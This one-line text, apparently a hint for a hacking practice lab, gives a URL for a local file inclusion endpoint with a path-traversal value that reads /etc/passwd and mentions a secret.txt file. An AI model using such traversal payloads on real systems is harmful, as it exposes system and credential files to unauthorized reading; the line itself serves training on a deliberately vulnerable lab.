You can easily grab either secret.txt or even etc/password: http://labs.hackxpert.com/LFI/endPoint.php?field2_name=/../../../../../etc/passwd